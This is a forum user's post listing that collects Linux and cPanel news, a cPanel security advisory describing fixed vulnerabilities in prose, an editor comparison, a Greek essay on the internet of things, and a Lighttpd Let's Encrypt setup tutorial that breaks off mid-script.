Jump to content
Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble
Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble

NickTheGreek

Administrators
  • Content Count

    454
  • Joined

  • Last visited

  • Days Won

    76
  • Feedback

    N/A

Everything posted by NickTheGreek

  1. It's time to say both hello and goodbye. Hello to Red Hat Enterprise Linux (RHEL) 6.9, the latest update to the RHEL 6 platform. And, goodbye, because this will be the last major update to this six-year-old enterprise Linux server distribution. Red Hat has just released the last major version of its RHEL 6.x operating system family: RHEL 6.9. RHEL 6.x has long been a business server favorite. With this last edition, Red Hat delivers new hardware support and updates to Transport Layer Security (TLS) 1.2 to improve network security. As you probably know, if you care at all about security, TLS implementations such as OpenSSL have had numerous security holes in recent months. The new RHEL 6 also comes with broader support for the latest Payment Card Industry Data Security Standard (PCI DSS)standards. If you're using RHEL in retail, this alone makes RHEL 6.9 a must-update. Jim Totton, Red Hat's VP and general manager of the Platforms Business Unit, said in a statement, "For more than six years, RHEL 6 has provided enterprise IT with a more secure, stable, and reliable platform for mission-critical workloads, from financial systems to national security applications. RHEL 6.9 shows our continued commitment to providing a solid backbone for production deployments, adding security and stability enhancements and an updated container base image to address a variety of vital business IT needs." While emphasizing stability for existing IT infrastructure, RHEL 6.9 looks ahead by supporting the next generation of cloud-native applications through an updated base image. This image enables you to migrate your existing RHEL 6 workloads into container-based applications. These can then be deployed on RHEL 7, RHEL Atomic Host, or Red Hat OpenShift Container Platform. As for RHEL 6 itself, it enters Production Phase 3 on May 10, 2017. That means that subsequent updates will be limited to critical security fixes and business-impacting urgent issues. RHEL 6.x will be supported until at least November 2020. After that its support life may be extended onward with extended life-cycle support. For more details on RHEL's support see the Red Hat Enterprise Linux Life Cycle web page. Since RHEL subscriptions aren't tied to a particular release, you can also update your RHEL 6 servers to RHEL 7 whenever you want with no charge. To help you with this migration, Red Hat provides instructions and two tools: Preupgrade Assistant and Red Hat Upgrade Tool. RHEL 6.9 is now available to all customers with an active Red Hat Enterprise Linux subscription via the Red Hat Customer Portal. If you're already a RHEL 6 user, this update is a no-brainer. Its security improvements alone make upgrading your servers to it a top priority. http://www.zdnet.com/article/red-hat-releases-the-last-of-the-rhel-6-x-line/
  2. cPanel TSR-2017-0002 Full Disclosure SEC-208 Summary Addon domain conversion did not require a package for resellers. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 2.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L Description Previously, when you converted an addon domain to a normal account, it was not required that a reseller specify a package for the account creation. This allowed the reseller to use the system's "default" package that has no account limits. Now, an addon domain conversion requires that a reseller have and specify a valid package for the account. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-217 Summary Self XSS Vulnerability in WHM cPAddons 'showsecurity' interface. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 4.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N Description When accessing the WHM cPAddons 'showsecurity' interface, the 'addon' parameter was not adequately escaped during page output. This could allow for arbitrary code to be injected into the rendered page. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-218 Summary Arbitrary file read via WHM /styled/ URLs. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 6.0 CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Description WHM supports /styled/ URLs in order to allow for reseller interface customization and branding. It is possible for these URLs to load and display content from a reseller's home directory. These files were being loaded as the root user. This allowed for arbitrary files on the system to be read. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 SEC-219 Summary File overwrite when renaming an account. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 3.2 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N Description When renaming an account it was possible to manipulate the security policy directories within the user's home directory to overwrite certain files the user did not own. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-220 Summary Arbitrary code execution during account modification. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 8.2 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Description When the primary domain of an account was changed in WHM's "Modify an Account" interface, the .htaccess file in the account's docroot was updated. This .htaccess update process included a syntax test, where it was possible for the cPanel user to execute arbitrary code as root. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-221 Summary Arbitrary code execution during automatic SSL installation. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 8.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Description During Autossl installation for user-controlled domains, the .htaccess file in the domain's docroot was updated to bypass redirects that would interfere with the domain validation process. This .htaccess update process included a syntax test, where it was possible for the cPanel user to execute arbitrary code as root. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 SEC-223 Summary Security policy questions were not transfered during account rename. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 2.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N Description If an account had security questions set up, and that account was renamed, the questions were not transferred to the renamed account correctly. This allowed an attacker to set up their own security questions by logging into the target account after an account rename was performed. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-224 Summary cPHulk one day ban bypass when IP based protection enabled. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Description It was possible under certain settings to never trigger a one day ban when IP-based protection was also enabled. Now, IP addresses are properly one day banned when the specified threshold is reached. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-225 Summary Code execution as root via overlong document root path settings. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 8.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Description By specifying a document root path which exceed Apache's maximum configuration line length limit, it was possible for this excessive data to be interpreted as a new configuration directive. This could allow for an attacker to run arbitrary code as the root user. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-226 Summary Arbitrary file overwrite via WHM Zone Template editor. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 6.8 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N Description The WHM Zone Template editor interface did not properly validate the template filename when saving. This allowed resellers to overwrite arbitrary files on the system. Credits This issue was discovered by rack911labs.com. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-227 Summary Expand list of reserved usernames. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 6.0 CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N Description It was possible to create certain user accounts and then leverage the user's home directory to enable various exploits. These account names have been added to the reserved username list. Credits This issue was discovered by rack911labs.com. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-228 Summary Adding parked domains to mail config did not respect domain ownership. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 2.4 CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N Description It was possible for a reseller to add parked domains, that they did not own, to the Exim mail configuration. A reseller must now own the parked domain to perform any action on it. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-229 Summary URL filtering flaw allowed access to restricted resources. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 4.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Description Due to faulty URL filtering, authenticated webmail accounts could access the PHPMyAdmin and PHPPGAdmin interfaces. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-232 Summary Demo code execution via Htaccess::setphppreference API. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 7.4 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L Description The Htaccess::setphppreference API call was not restricted for demo accounts and accepted arbitrary data to be written into the account's .htaccess file. This could allow for an attacker to execute arbitrary codeunder the demo account. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46 SEC-233 Summary Arbitrary code execution for demo accounts via NVData_fetchinc API call. Security Rating cPanel has assigned this vulnerability a CVSSv3 score of 7.4 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L Description The NVData_fetchinc API call could accept an arbitrary filename to be included and processed by the cPanel engine. It was possible for an attacker to use this to execute arbitrary code under a demo account. Credits This issue was discovered by the cPanel Security Team. Solution This issue is resolved in the following builds: 11.62.0.17 11.60.0.39 11.58.0.45 11.56.0.46
  3. If you want to turn a polite conversion into a heated debate then start talking about religion, politics, or text editors. Yes, you heard me right. Text editors. Without trying to rekindle the editor wars, let’s look at when you might consider using nano, emacs, or vim. Nano Nano is without a doubt the simplest, least complicated, and least powerful of the three editors. The great thing about nano is that it really doesn’t have much of a learning curve. Anytime you’re using nano you’ll see a list of all the commands you’ll need at the bottom of your screen. You don’t have to remember any commands ever. Just know that the caret symbol “^” represents the control key. So ^X is really Ctrl-X and it exits nano. When you perform different operations the menu displayed at the bottom of your screen updates with the currently available commands. Also, any prompts that need to be dealt with are displayed at the bottom of the screen as well. For example, if you try to exit nano and have unsaved changes, you’ll be prompted to save them with a Yes/No question. Nano Pros: No learning curve. Easy to use. Idiot proof. Good for simple edits. Nano Cons: Making complicated edits can be difficult and time-consuming. No powerful features such as macros, editing multiple files at once, window splitting, vertical block/rectangle selecting/editing, auto-completion, etc. Who Nano Is For: Nano is great for people who are new to the command line or for anyone who needs to make a very simple edit. If you’re a casual Linux user or hobbyist, nano might be all you ever need. Emacs Emacs is a text editor, but it’s so much more than that. It comes with a built-in web browser, IRC client, calculator, and even Tetris. See for yourself: Emacs has a keyboard shortcut for absolutely everything. The good thing about that is you can often stay in your normal typing position which makes you fairly efficient. The downside of that is you end up having to remember a lot of shortcuts with various combinations using multiple modifier keys. For example, the shortcut to quit Emacs is C-x C-c. That means you’ll hold down the control key, type x, then type c. One of the areas where Emacs really shines is its ability to be fully customized. If you find yourself wanting to do something the authors didn’t think of, you can implement it yourself using Emacs Lisp. Of course, you have to know or learn Lisp to do it, but it’s at least possible. Emacs Pros: Customizable and extensible. Powerful editing capabilities. Mature integration with many free software programming tools. You never need to leave it because you can edit files, browse the web, and so on. Emacs Cons: Questionable ergonomics. (AKA: Emacs Pinky Syndrome.) If you want to customize Emacs you’ll need to learn Emacs Lisp which introduces a whole new learning curve. Not available everywhere by default. If you need to edit files on a system that you don’t have root access to and emacs isn’t installed, then you’ll end up using vim. Lack of emacs availability is common for server installations. Who Emacs Is For: Emacs is for people who want more than just a text editor as Emacs can be an “environment.” It’s also for people who have a strong desire or need to customizations. Vim I’m a huge fan of the “make each program do one thing well” philosophy. As we’ve already covered, Emacs is not only a text editor, it’s also an IRC client, a game console, and a web browser. You could argue that the one thing Emacs does well is editing text, but it’s definitely not my go-to choice for a web browser. Nano does one thing, but not very well. When I say “not very well” I mean that it has limited functionality as a text editor. That leaves Vim. It adheres to the “do one thing and do it well” philosophy because the one thing it does extremely well is editing text. If you’re a sysadmin, a programmer, or anyone who needs to do serious text editing, then vim could be the next (and last) editor you’ll ever need to learn. Once you have a handle on vim you’ll be super fast and efficient. If you’re going to work regularly at the command line, learning this powerhouse editor is a worthwhile investment. With the ability to edit and view multiple files at once, create macros, perform global substitutions and more, you’ll look like a genius when you click a couple of buttons on your keyboard and great swaths of text fall into place just like you want. Even if you’re not into being as productive as you can be, you still need to learn the basics of vim because sooner or later you’ll end up using it whether you like it or not. Vim is the default editor for the overwhelming majority of Linux distributions. This means you’ll find yourself using vim with programs that do not include their own built-in editor such as crontab, visudo, git, etc. Also, because many server installations only include what is necessary to perform their primary function, you often won’t find emacs installed by default. With sysadmin tools relying on vim and the lack of other text editors, knowing vim is a must. Said another way, if you are or ever want to be a Linux system administration you HAVE to know vim. Vim Pros: Vim serves one and only one purpose; to efficiently edit text. It’s astoundingly powerful. Making complicated edits can be quick and easy. You can unlock unparalleled efficiency and speed with powerful features such as multiple file/window support, keyboard shortcuts for everything, macros, registers, quick command repetition, auto-completion, text objects, filters, and global substitutions. Vim Cons: The learning curve often scares away new users. If you don’t know what you’re doing you’ll look like an idiot. (“Who do I exit out of Vim?!?!?!”) If you only ever need to perform super simple edits, Vim can be overkill. Who Vim Is For: Vim is a must for Linux system administrators. It’s also great for programmers because coding is mainly editing plain text files which Vim excels at. It’s also ideal for anyone who works on the command line often or has to log into Linux servers. Really, Vim is for those who work with textual data of any type. https://www.linuxtrainingacademy.com/nano-emacs-vim/
  4. Linux ip Command Networking Cheat Sheet https://www.linuxtrainingacademy.com/linux-ip-command-networking-cheat-sheet/
  5. Year 2038 problem From Wikipedia, the free encyclopedia Animation showing how the date would reset, represented as a signed 32-bit integer (at 03:14:08 UTC on 19 January 2038). The Year 2038 problem is an issue for computing and data storage situations in which time values are stored or calculated as a signed 32-bit integer, and this number is interpreted as the number of seconds since 00:00:00 UTC on 1 January 1970 (the epoch).[1] Such implementations cannot encode times after 03:14:07 UTC on 19 January 2038, a problem similar to but not entirely analogous to the Y2K problem (also known as the Millennium Bug), in which 2-digit values representing the number of years since 1900 could not encode the year 2000 or later. Most 32-bit Unix-like systems store and manipulate time in this Unix time format, so the year 2038 problem is sometimes referred to as the Unix Millennium Bug by association. https://en.wikipedia.org/wiki/Year_2038_problem
  6. δεν αναλύουν κάτι παραπάνω άρα πρακτικά είναι bug fix release ?
  7. March 16, 2017 With the first TSR release of 2015 we began providing CVSSv2 scores in our full disclosure of resolved security issues in cPanel & WHM. The CVSSv2 scoring system is a free and open standard that attempts to rate the severity of security vulnerabilities (finalized in June 2007). In June 2015 this scoring system was updated to version 3, and includes several changes to the way that the scores are determined. Specifically, the underlying vectors used to derive the numerical scores of the metric groups have been changed, and the updated scoring system is intended to reflect a more accurate estimation of the severity of vulnerabilities. Beginning with the second TSR release of 2017 (TSR-2017-0002, expected on March 21st), we will provide a CVSSv3 Base vector score range in our TSR announcements, and the full Base vector string and score for each resolved vulnerability in our full disclosure announcements. If you would like to learn more about the various vectors used to calculate CVSSv3 scores along with the underlying reasoning as applicable to the CVSS standard, please see https://www.first.org/cvss and https://www.first.org/cvss/calculator/3.0. http://news.cpanel.com/updates-to-tsr-announcement-and-disclosure-information/
  8. είμαστε για update απόψε
  9. Η πλειονότητα των μελετητών προβλέπει νέες εξελίξεις στον τομέα της τεχνολογίας στο κοντινό μας μέλλον. Προβλέπουν ότι το διαδίκτυο θα καταστεί ακόμη πιο σημαντικό για τη ζωή μας, αν και θα είναι λιγότερο ορατό. Υποστηρίζουν ότι το διαδίκτυο θα καταστεί αντίστοιχο της «ηλεκτρικής ενέργειας» και θα προσφέρει ακόμη μεγαλύτερη διασύνδεση ανάμεσα στον άνθρωπο και τη μηχανή με αποτέλεσμα να αλλάξει τα πάντα, από τις διαπροσωπικές αλληλεπιδράσεις έως τις αποφάσεις που λαμβάνονται σε κυβερνητικό επίπεδο σε όλο τον κόσμο. Είναι γεγονός ότι το διαδίκτυο όχι μόνον αναπτύσσεται, αλλά και εξελίσσεται στις τελευταίες δύο δεκαετίες, συχνά με απρόβλεπτους τρόπους. Η πρώτη ώθηση έγινε με την κατασκευή του διαδικτύου. Εταιρείες, όπως η AOL δημιούργησαν την υποδομή και έφεραν καταρχάς την Αμερική και μετέπειτα τον υπόλοιπο κόσμο σε απευθείας συνεχή ή διαρκή σύνδεση. Η φάση αυτή κορυφώθηκε γύρω στη στροφή του εικοστού αιώνα, θέτοντας τις βάσεις για το δεύτερο κύμα, το οποίο επέφερε την έλευση των εφαρμογών και υπηρεσιών θέτοντας το διαδίκτυο κυρίαρχο τόσο στο πεδίο της επικοινωνίας, όσο και στην οικονομία. Στις μέρες μας έχει ήδη δρομολογηθεί ένα τρίτο κύμα. Σύμφωνα με τις προβλέψεις, στην επόμενη δεκαετία, το διαδίκτυο θα έχει μια πανταχού παρουσία, η ταχύτητα με την οποία θα διανέμει κείμενα, στοιχεία και εικόνες θα είναι τεράστια, με αποτέλεσμα η μαζική του χρήση να το καταστήσει όχι μόνον αναπόσπαστο μέρος της καθημερινής μας ζωής, αλλά και θα καταστεί «αόρατο», δηλαδή πανταχού παρόν, όπως σήμερα αντιλαμβανόμαστε και χρησιμοποιούμε το ηλεκτρικό ρεύμα. Οι αριθμοί είναι καθηλωτικοί: Το 1995 συνδέονταν στο διαδίκτυο 39,6 εκατομμύρια άνθρωποι στον κόσμο. Ο αριθμός τους ανήλθε στο 1 δισεκατομμύριο το 2005, στα 3,2 δισεκατομμύρια το 2015 και προβλέπεται να ανέλθει στα 7,6 δισεκατομμύρια ανθρώπους το 2020 - αξίζει να σημειωθεί ότι σύμφωνα με τις προβλέψεις ο διαδικτυακός πληθυσμός θα είναι μεγαλύτερος του πραγματικού ανθρώπινου πληθυσμού. Από την παράθεση και μόνον των παραπάνω στοιχείων, διαφαίνεται ότι το διαδίκτυο έρχεται πλέον να αμφισβητήσει την πρωτοκαθεδρία άλλοτε κραταιών τομέων της οικονομίας, όπως η υγειονομική περίθαλψη, η εκπαίδευση, οι χρηματοοικονομικές υπηρεσίες, η ενέργεια και οι μεταφορές, που αθροιστικά αντιπροσωπεύουν περισσότερο από το ήμισυ της δυτικής οικονομίας. Αναλογιστείτε μόνον, πόσο η έλευση του διαδικτύου έχει μεταβάλλει τον τρόπο παροχής της εκπαίδευσης. Το e-Learning, λόγου χάρη, είναι μια από τις εφαρμογές του. Ενδεχομένως, η εξάπλωση του διαδικτύου θα ενισχύσει την παγκόσμια συνδεσιμότητα, την αναβάθμιση των σχέσεων μεταξύ των κοινωνιών. Τα στοιχεία είναι και πάλι εντυπωσιακά. Κάθε δευτερόλεπτο στέλνουμε 7.173 τουίτ, κάνουμε 53.766 αναζητήσεις στο Google, βλέπουμε 120.607 βίντεο στο YouTube, στέλνουμε 2.481.685 μηνύματα από το ηλεκτρονικό ταχυδρομείο, ενώ η κίνηση στο διαδίκτυο ανέρχεται στα 35 εκατομμύρια μεγαμπάιτ στο δευτερόλεπτο. Οι ταχύτητες γίνονται πιο γρήγορες επίσης. Το 1995 για να κατεβάσει κανείς ένα τραγούδι 4λεπτης διάρκειας ήθελε 540 δευτερόλεπτα, το 2005 χρειαζόταν 11 δευτερόλεπτα και το 2015 το «φόρτωνε» στη στιγμή, σε μόλις 2 δευτερόλεπτα. Το διαδίκτυο, η τεχνητή νοημοσύνη και ένας τεράστιος όγκος δεδομένων, θα κάνουν τους ανθρώπους να έχουν καλύτερη κατανόηση του κόσμου τους και της συμπεριφοράς τους. Δεν είναι λοιπόν τυχαίο ότι οι περισσότεροι εμπειρογνώμονες προβλέπουν ότι στο όχι μακρινό μας μέλλον, το «διαδίκτυο των πραγμάτων» θα περιλαμβάνει ένα παγκόσμιο, καθηλωτικό, αόρατο περιβάλλον δικτύου υπολογιστών. Τα δεδομένα που διακινούνται πολλαπλασιάζονται: Η Αmazon ήδη διαθέτει 30 κέντρα δεδομένων, με 50.000 σέρβερ. Εκτιμάται ότι μέσα στο 2017 θα υπάρχουν ανά τον κόσμο περίπου 9 εκατομμύρια κέντρα δεδομένων. Οι περισσότεροι προβλέπουν ότι στο όχι μακρινό μας μέλλον, το «διαδίκτυο των πραγμάτων» θα περιλαμβάνει: Ένα παγκόσμιο, καθηλωτικό, αόρατο, ατμοσφαιρικό περιβάλλον δικτύου υπολογιστών. Μια συνεχή εξάπλωση των έξυπνων αισθητήρων, φωτογραφικών μηχανών, λογισμικού, βάσεις δεδομένων και τεράστια κέντρα δεδομένων σε έναν κόσμο - που θα βασίζεται σε αυτό που αποκαλείται ως το «Διαδίκτυο των Πραγμάτων» - σύμφωνα με το οποίο το διαδίκτυο επεκτείνεται στο φυσικό κόσμο, εμπεριέχοντας και συνδέοντας πράγματα, φυσικά αντικείμενα της καθημερινότητας και τεχνουργήματα μέσω πρωτοκόλλων και από απόσταση. Φορητές τεχνολογίες που θα επιτρέπουν στους ανθρώπους να «αυξήσουν την πραγματικότητα». Το τέλος των επιχειρηματικών μοντέλων που αναδύθηκαν τον 20ο αιώνα, κυρίως στα πεδία της εκπαίδευσης, της ψυχαγωγίας και των έντυπων μέσων ενημέρωσης. Διαχείριση ενός απίστευτου σε μέγεθος όγκου δεδομένων. Στην ουσία βρισκόμαστε ενώπιον μιας ευρύτερης αλλαγής, όπου θα απαιτηθούν συμμαχίες, και εποικοδομητικός διάλογος ανάμεσα στους κόσμους της πολιτικής, της οικονομίας και της επικοινωνίας, η οποία όπως και τα στοιχεία συνιστούν θα αποκτήσει ακόμη μεγαλύτερη δυναμική. Με άλλα λόγια, ένας «νέος γενναίος ψηφιακός κόσμος» αναδύεται με ταχύτητα, καθώς το διαδίκτυο κι άλλες συναφείς τεχνολογίες εξαπλώνονται. Αλλά θα μπορούσε αυτό να είναι κακή παρά καλή είδηση; Το χάσμα όμως ανάμεσα σε πλούσιες και λιγότερο πλούσιες χώρες παραμένει. Για παράδειγμα, οι λιγότερο πλούσιες χώρες που δεν έχουν πρόσβαση στις τεχνολογίες θα εμφανίσουν μειονεκτήματα σε σχέση με άλλες, και σε ορισμένες περιπτώσεις, σύμφωνα με τις προβλέψεις, θα μπορούσαν να επιδεινωθούν οι κοινωνικές ανισότητες. Κάτι τέτοιο έρχεται σε αντίθεση με ορισμένες από τις υποθέσεις όπως ότι η διάδοση του διαδικτύου θα μειώσει τις ανισότητες. Στην Ινδία, για παράδειγμα, η πρόσβαση στο διαδίκτυο, παρά την απήχηση κι εκεί του Facebook, παραμένει περιορισμένη. Αναμφισβήτητα η θεαματική ανάπτυξη του διαδικτύου έχει αλλάξει όχι μόνο τα επιχειρηματικά μοντέλα, αλλά και τον τρόπο που λειτουργούμε ως κοινωνία. Έχει επηρεάσει το πώς αναζητούμε, μοιραζόμαστε τις πληροφορίες, τον όγκο των πληροφοριών που θα πρέπει να μοιραζόμαστε, το πώς θα επικοινωνούμε μεταξύ μας, όταν επικοινωνούμε, κοκ. To «Επόμενο Διαδίκτυο», όπως αποκαλείται, συγκεντρώνει και συνδυάζει τρία διασυνδεδεμένα συστήματα: το Cloud Computing, το Big Data Analytics και το Διαδίκτυο των πραγμάτων. Υπόσχεται στις επιχειρήσεις και τους κυβερνητικούς οργανισμούς κεντρική αποθήκευση και υπηρεσίες δεδομένων σε τεράστια ψηφιακά εργοστάσια, που επεξεργάζονται και αναλύουν τις αδιάκοπες ροές των πληροφοριών, που συλλέγονται από δικτυωμένους αισθητήρες, που αποθηκεύονται σε κάθε πιθανή συσκευή των καταναλωτών, στο γραφείο ή στην αγορά, καθώς και σε ζωντανούς οργανισμούς. Αλλά δημιουργεί επίσης σημαντικές προκλήσεις σχετικά με το περιβάλλον, την προστασία της ιδιωτικής ζωής και της εργασίας. Το Cloud και τα Big Data έχουν ενισχυθεί σημαντικά από την ανάπτυξη του διαδικτύου. Από ρολόγια που παρακολουθούν την πίεση του αίματος στα ψυγεία που σας ζητούν να αγοράσετε νέο γάλα, από γραμμές συναρμολόγησης «επανδρωμένων» από ρομπότ έως τα μη επανδρωμένα αεροσκάφη που παραδίδουν όπλα, υπόσχεται έναν βαθύτερο κοινωνικό αντίκτυπο. Το Ίντερνετ των πραγμάτων αναφέρεται σε ένα σύστημα που εγκαθιστά αισθητήρες και συσκευές θερμικής επεξεργασίας σε αντικείμενα καθημερινής χρήσης (π.χ. ρολόγια) και τα εργαλεία παραγωγής (ρομποτικών βραχιόνων), και να τους συνδέει σε δίκτυα που συγκεντρώνουν και να χρησιμοποιούν τα δεδομένα σχετικά με τις επιδόσεις τους. Αναφερόμαστε στον ομολογουμένως περίεργο όρο του «Διαδικτύου των πραγμάτων», διότι, σε αντίθεση με το διαδίκτυο που γνωρίζουμε, το οποία συνδέει τους ανθρώπους, το «Διαδίκτυο των πραγμάτων» συνδέεται κυρίως με αντικείμενα. Οι αισθητήρες στο ψυγείο σχηματίζουν ένα δίκτυο από πράγματα που αναφέρεται σε αυτό που είναι μέσα και πώς χρησιμοποιείται. Το διαδίκτυο των πραγμάτων έχει καταστεί δυνατό από τις προόδους στην ικανότητα να σμικρύνει τις συσκευές σάρωσης και να παρέχουν επαρκή επεξεργαστική ισχύ για την παρακολούθηση μιας δραστηριότητας, την ανάλυση μιας χρήσης και να παραδώσει τα αποτελέσματα της καταγραφής μέσω των ηλεκτρονικών δικτύων Πώς θα αντιμετωπίσουμε αυτόν το νέο γενναίο, ψηφιακό κόσμο; Τι κάνουμε εμείς στην Ελλάδα; Δυστυχώς παραμένουμε απασχολημένοι με την πρώιμη φάση της ανάπτυξης του διαδικτύου, μετρώντας την διάδοσή και την απήχησή του, όταν αυτά τα ζητήματα σε άλλες χώρες θεωρούνται ήδη ξεπερασμένα. Στέλιος Παπαθανασόπουλος Καθηγητής Οργάνωσης και Πολιτικής των Μ.Μ.Ε. | Τμήμα Επικοινωνίας και Μέσων Μαζικής Ενημέρωσης ΕΚΠΑ http://www.indeepanalysis.gr/nees-technologies/to-diadiktyo-twn-anthrwpwn-kai-twn-pragmatwn
  10. Iread your Nginx and Let’s Encrypt free SSL certificate tutorial. However, I use Lighttpd web server on AWS cloud. How do I secure my Lighttpd web server with Let’s Encrypt free SSL certificate on my Ubuntu Linux 16.04 LTS or Debian Linux 8.x server?Let’s Encrypt is a free, automated, and open certificate authority for your website or any other projects. You can grab free TLS/SSL certificate to create encrypted HTTPS session for your site visitors. In this tutorial, I will explain how to use Let’s Encrypt to install a free SSL certificate for Lighttpd web server along with how to properly deploy Diffie-Hellman on your Lighttpd server to get SSL labs A+ score. Our sample setup Fig.01: Our sample Lighttpd TLS/SSL Security with Let’s Encrypt on Debian or Ubuntu Linux Default Lighttpd config file : /etc/lighttpd/lighttpd.conf Default Lighttpd SSL config file : /etc/lighttpd/conf-enabled/10-ssl.conf Lighttpd SSL certification directory : /etc/lighttpd/ssl/cyberciti.biz/ Lighttpd DocumentRoot (root) path : /var/www/html/ Lighttpd TLS/SSL Port: 443 Our sample domain: www.cyberciti.biz Dedicated public IP: 74.86.26.69 Step 1 – Install acme.sh client Type the following apt-get command/apt command:$ sudo apt-get install git bc wget curl Sample outputs: Fig.02: Install git and bc on Ubuntu/Debian Linux Step 2 – Clone repo Type the following commands:$ cd /tmp $ git clone https://github.com/Neilpang/acme.sh.git $ sudo -i # cd /tmp/acme.sh/ # ./acme.sh --install Sample outputs: Fig.03: Clone the acme.sh client using git Rest of all command need to be type as root user. Become root user:$ sudo -i Step 3 – Create /.well-known/acme-challenge/ directory Type the following command (set D to actual server.document-root path as per your setup):# D=/var/www/html # mkdir -vp ${D}/.well-known/acme-challenge/ ###---[ NOTE: Adjust permission as per your setup ]---### # chown -R www-data:www-data ${D}/.well-known/acme-challenge/ # chmod -R 0555 ${D}/.well-known/acme-challenge/ Step 4 – Create directory to store SSL certificate Type the following mkdir command:# mkdir -p /etc/lighttpd/ssl/cyberciti.biz/ Step 5 – Create your dhparam.pem file Type the following command to create a strong Diffie-Hellman (DH) group file:# cd /etc/lighttpd/ssl/cyberciti.biz/ # openssl dhparam -out dhparam.pem -dsaparam 4096 Sample outputs: Step 6 – Issue a certificate for your domain The syntax is:acme.sh --issue -w /server.document-root-path/ -d www.example.com acme.sh --issue -w /var/www/html/ -d example.com -k 2048 To issue a certificate for www.cyberciti.biz, enter:# acme.sh --issue -w /var/www/html -d www.cyberciti.biz -k 4096 Sample outputs: Fig.04: Issue a certificate Step 7 – Enable ssl for Lighttpd Type the following command:# lighttpd-enable-mod sslEnabling ssl: ok Run /etc/init.d/lighttpd force-reload to enable changes Step 8 – Lighttpd SSL Configuration Edit the file /etc/lighttpd/conf-enabled/10-ssl.conf, enter:# vi /etc/lighttpd/conf-enabled/10-ssl.conf Update it as follows: # turn on ssl # $SERVER["socket"] == "0.0.0.0:443" { ssl.engine = "enable" ssl.disable-client-renegotiation = "enable" ssl.pemfile = "/etc/lighttpd/ssl/cyberciti.biz/ssl.pem" ssl.ca-file = "/etc/lighttpd/ssl/cyberciti.biz/ca.cer" ssl.dh-file = "/etc/lighttpd/ssl/cyberciti.biz/dhparam.pem" # ECDH/ECDHE ciphers curve strength ssl.ec-curve = "secp384r1" ssl.use-compression = "disable" # Environment flag for HTTPS enabled setenv.add-environment = ( "HTTPS" => "on" ) ssl.use-sslv2 = "disable" ssl.use-sslv3 = "disable" ssl.honor-cipher-order = "enable" ssl.cipher-list = "EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH" # HSTS(15768000 seconds = 6 months) setenv.add-response-header = ( "Strict-Transport-Security" => "max-age=15768000;" ) } Save and close the file. Step 9 – Install the issued certificate for Lighttpd web server First create a hook for lighttpd ssl.pem file as follows:# vi /root/.acme.sh/www.cyberciti.biz/hook.sh Append the following script: #!/bin/bash dom="www.cyberciti.biz" 